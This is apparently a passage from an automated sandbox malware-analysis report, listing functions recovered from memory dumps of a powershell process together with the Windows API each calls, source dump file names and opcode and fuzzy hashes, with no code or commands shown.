    • Instruction ID: 9cfa8bad32ff2d11d6ff9be44072d0a19398a3a3f09fb9756290dff1f3251ce3
    • Opcode Fuzzy Hash: 83262700287add43387a9718e1d9f2668579e6a362128ead88e87f9b5df1cf7e
    • Instruction Fuzzy Hash: 11117CB56046049FEB21DF25DC85B56FBE8EF44324F0884AAED09CB642D670EC04CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01EF02D6 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.888384195.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1ef0000_powershell.jbxd
    Similarity
    • API ID: ConsoleWrite
    • String ID:
    • API String ID: 2657657451-0
    • Opcode ID: 4bd91e1182ea34cfd06f5ad0ab472be2bb069a79921fdfe9415609898c5e880a
    • Instruction ID: 54595be65ac0a22195c63f2fa3cc84f355bb4739876eef5a1564a90878cbafca
    • Opcode Fuzzy Hash: 4bd91e1182ea34cfd06f5ad0ab472be2bb069a79921fdfe9415609898c5e880a
    • Instruction Fuzzy Hash: 8F118E75601300DFEB208F55D884B6BFBA5EF44224F0884AEEE498B652D271E554CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CB8F2 Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
    Download Yara Rule
    APIs
    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 003CB93E
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: e76eacc1dea00e3aa3a06545925e00022ae3b79c55832a2a8f1cd86050e40d5f
    • Instruction ID: 67db47325e4c6fa25fae0e4c3f850e6eaa45f33bdae1710b0784e71721fb9c5c
    • Opcode Fuzzy Hash: e76eacc1dea00e3aa3a06545925e00022ae3b79c55832a2a8f1cd86050e40d5f
    • Instruction Fuzzy Hash: FE118E32500304DFDB21CF55D885B52FBE4EF44320F0885AEEE898A612D371E818DF61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CA1EE Relevance: 1.5, APIs: 1, Instructions: 47COMMON
    Download Yara Rule
    APIs
    • EnumWindows.USER32(?,00000E9C,?,?), ref: 003CA23E
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: EnumWindows
    • String ID:
    • API String ID: 1129996299-0
    • Opcode ID: eddd89c1a46ae007cb4ba17db95a7cadb34d42cfcf8116885bf3ab5720715f68
    • Instruction ID: bdbcdd857932e289ffce7d4499142a0d390e123bbd011ed9b1c615e721502cef
    • Opcode Fuzzy Hash: eddd89c1a46ae007cb4ba17db95a7cadb34d42cfcf8116885bf3ab5720715f68
    • Instruction Fuzzy Hash: F9018471900200AFE710DF16DC45B26FBE8FF84A20F14855AED089B741D235F916CBE5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01EF0032 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
    Download Yara Rule
    APIs
    • SetConsoleTitleW.KERNEL32(?), ref: 01EF006C
    Memory Dump Source
    • Source File: 00000003.00000002.888384195.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1ef0000_powershell.jbxd
    Similarity
    • API ID: ConsoleTitle
    • String ID:
    • API String ID: 3358957663-0
    • Opcode ID: c5046c372ced56fa539353e312aeeb8368498c6987e7784cd7aedd7a9fcf1d76
    • Instruction ID: eef042668fcdf3cf59e070422df50f985b4b2eec8d5c3aa6ef4008c8fb0271be
    • Opcode Fuzzy Hash: c5046c372ced56fa539353e312aeeb8368498c6987e7784cd7aedd7a9fcf1d76
    • Instruction Fuzzy Hash: FB0171756042449FEB50CF29D8857AAFBD4EF44324F08C8AEEE49CB283D675E944CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CB9BA Relevance: 1.5, APIs: 1, Instructions: 44COMMON
    Download Yara Rule
    APIs
    • GetConsoleScreenBufferInfo.KERNEL32 ref: 003CB9EF
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: BufferConsoleInfoScreen
    • String ID:
    • API String ID: 3437242342-0
    • Opcode ID: 05f7183af2d2ee2b4cf99f754e696283ab837cce700b176c5275e587f5bb0016
    • Instruction ID: 6ba2fb4b5490040e2ffeb33de0a9f011bc2adaf46f73965cf0a525dba2841f6f
    • Opcode Fuzzy Hash: 05f7183af2d2ee2b4cf99f754e696283ab837cce700b176c5275e587f5bb0016
    • Instruction Fuzzy Hash: 3101BC395042409FEB118F15D886B66FBA4EF44320F18C4AEED89CB642D375E914CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01EF0226 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
    Download Yara Rule
    APIs
    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 01EF025B
    Memory Dump Source
    • Source File: 00000003.00000002.888384195.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1ef0000_powershell.jbxd
    Similarity
    • API ID: AttributeConsoleText
    • String ID:
    • API String ID: 646522457-0
    • Opcode ID: cd8779678104810b8ce4f9adbebf44a35eb18c112725b936d7e1a740b360c109
    • Instruction ID: f625f537d60b0c832fd98198f3bca641bbfad6498ebfd4df1dff9b895e0ad03e
    • Opcode Fuzzy Hash: cd8779678104810b8ce4f9adbebf44a35eb18c112725b936d7e1a740b360c109
    • Instruction Fuzzy Hash: 1301B1395042409FEF118F15D88476AFB94EF44620F08C4AEEE098B243E275E444DB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CA8FA Relevance: 1.5, APIs: 1, Instructions: 43COMMON
    Download Yara Rule
    APIs
    • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 003CA94A
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: LanguageName
    • String ID:
    • API String ID: 2060303382-0
    • Opcode ID: 8c70db932a0dc9fe7394d2e44caa5ec1123e1aa77b3d5058e95f3eb1f0862aa6
    • Instruction ID: f39d0c965e5d82bf76ca13cc048e239cb0b5d6628322959bdbf4f7368fe22358
    • Opcode Fuzzy Hash: 8c70db932a0dc9fe7394d2e44caa5ec1123e1aa77b3d5058e95f3eb1f0862aa6
    • Instruction Fuzzy Hash: 1D016271900200ABD710DF16DC46B26FBA4FF88B20F14815AED085B741D271F956CBE6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01EF0182 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.888384195.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1ef0000_powershell.jbxd
    Similarity
    • API ID: ShowWindow
    • String ID:
    • API String ID: 1268545403-0
    • Opcode ID: 5395abc77d2be2c6f2938c992a8e509d711963b7cddd2cd352e921b44ecb8f34
    • Instruction ID: 7cf14422383c3727beba25e192b4a823886de754811e1d98e0e43bf1280fd1eb
    • Opcode Fuzzy Hash: 5395abc77d2be2c6f2938c992a8e509d711963b7cddd2cd352e921b44ecb8f34
    • Instruction Fuzzy Hash: 1E01D6355043009FEB118F15DC8576AFBE4EF04224F08C0AEEE094B253D275E944CF61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CA36A Relevance: 1.5, APIs: 1, Instructions: 35COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: Flags
    • String ID:
    • API String ID: 3401871038-0
    • Opcode ID: 67d9c51dee78e266a7f425d6e0c18d1d0d9f0b74e6f38df88e51a4994cf42be5
    • Instruction ID: 4decdaa24fa09848f74fcb76fcc6acbbb77d30d72f11a1d73d3ee19128f42349
    • Opcode Fuzzy Hash: 67d9c51dee78e266a7f425d6e0c18d1d0d9f0b74e6f38df88e51a4994cf42be5
    • Instruction Fuzzy Hash: CBF0DC385046889FEB218F05D888B65FBA0EF00324F18C19ADD088B242D375AD08CBA2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CAA42 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: ConsoleWindow
    • String ID:
    • API String ID: 2863861424-0
    • Opcode ID: 6fb850e4cc626de22ff424d23f4bd2a2b742e8770ae4b92de653735636497734
    • Instruction ID: 21e33eebf718c3fed12ab5fcde04a962b7d88c20feb89665754fa2c5278b528c
    • Opcode Fuzzy Hash: 6fb850e4cc626de22ff424d23f4bd2a2b742e8770ae4b92de653735636497734
    • Instruction Fuzzy Hash: E0F0C239504B489FEB11CF15D989B61FB94DF44334F18C09ADD098B642D275ED44CFA2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CA974 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
    Download Yara Rule
    APIs
    • CloseHandle.KERNELBASE(?), ref: 003CA9C8
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID:
    • API String ID: 2962429428-0
    • Opcode ID: a440a446a01fdcc54da9a730c80ae54cc73d5a361a9425afb0096c68b19efe75
    • Instruction ID: 062e84fa0c27cf56219ae89ae60cfde82483ae7f6e166082b07d337e072e915d
    • Opcode Fuzzy Hash: a440a446a01fdcc54da9a730c80ae54cc73d5a361a9425afb0096c68b19efe75
    • Instruction Fuzzy Hash: 9611E3755093C09FDB128F25DC88B52BFA4DF02224F0880EBED89CB252D275A818CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003CA996 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
    Download Yara Rule
    APIs
    • CloseHandle.KERNELBASE(?), ref: 003CA9C8
    Memory Dump Source
    • Source File: 00000003.00000002.888171099.00000000003CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 003CA000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3ca000_powershell.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID:
    • API String ID: 2962429428-0
    • Opcode ID: 17d93a11f681b844c8ef86d6aa5aab0ab52d6b066cd58052af65ad19e6156db4
    • Instruction ID: 5ce19e40690f57f6b83933f4a98f7414a20757d12f3179429b7ac7c07f6cf315
    • Opcode Fuzzy Hash: 17d93a11f681b844c8ef86d6aa5aab0ab52d6b066cd58052af65ad19e6156db4
    • Instruction Fuzzy Hash: FC01DF356046489FEB108F15D889B66FB94DF40324F18C4AFDD0ACB642D275ED04DB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 029607F7 Relevance: .0, Instructions: 44COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.888416432.0000000002960000.00000040.00000020.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_2960000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e3231045b3f046ece48374a78458b336a7562985588cff2b35350bbabcbe281a
    • Instruction ID: 063a0f5af145578be6c5474055e8b8b4d6f181c80bd837f4f5e4ca338d44d53e
    • Opcode Fuzzy Hash: e3231045b3f046ece48374a78458b336a7562985588cff2b35350bbabcbe281a
    • Instruction Fuzzy Hash: 4E01D6B65083805FD712CB06EC55863FFB8EF86630708C09BEC498B652D225B908CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0296081E Relevance: .0, Instructions: 27COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.888416432.0000000002960000.00000040.00000020.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_2960000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 9b066a67206564891363f7ec46375b32b5bdf1e8aec1d586ce16ce9cde807f0a
    • Instruction ID: 672a4d01b3d7f1b0272512390835a19da1d4abced4004f5a1cce397a470f1a3d
    • Opcode Fuzzy Hash: 9b066a67206564891363f7ec46375b32b5bdf1e8aec1d586ce16ce9cde807f0a
    • Instruction Fuzzy Hash: BAE092766047008BD750DF0AEC85452F7D4EF84630B18C47FDC0D8B700D135B509CAA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003C23F4 Relevance: .0, Instructions: 15COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.888168628.00000000003C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C2000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3c2000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 726433ab80e3f0ec904d1110fa2fdcda5352246beecfc3dd05e683f22e517752
    • Instruction ID: e8c1670ba28d0764be5d4705da000a417b68f800c96cfb8d6eea094428aeddea
    • Opcode Fuzzy Hash: 726433ab80e3f0ec904d1110fa2fdcda5352246beecfc3dd05e683f22e517752
    • Instruction Fuzzy Hash: E4D05E792056914FD71B8A1DC5A4F9637A4AF95B04F4744FDE840CB6A3C369ED81D300
    Uniqueness

    Uniqueness Score: -1.00%

    Function 003C23BC Relevance: .0, Instructions: 14COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.888168628.00000000003C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 003C2000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_3c2000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a801f0481a864be1240acd97e6325c56894fb5f588c2f80e04b72b5e5600d096
    • Instruction ID: f7b7dc2b06ed835cc6c94c1c1fd606742f19d4001bcad5e3bc04634d19ddc47d
    • Opcode Fuzzy Hash: a801f0481a864be1240acd97e6325c56894fb5f588c2f80e04b72b5e5600d096
    • Instruction Fuzzy Hash: 3AD052383002818FDB2ACA1CC294F6A73E4AF80B00F0744ECAC10CB266C3A9ED81CB00
    Uniqueness

    Uniqueness Score: -1.00%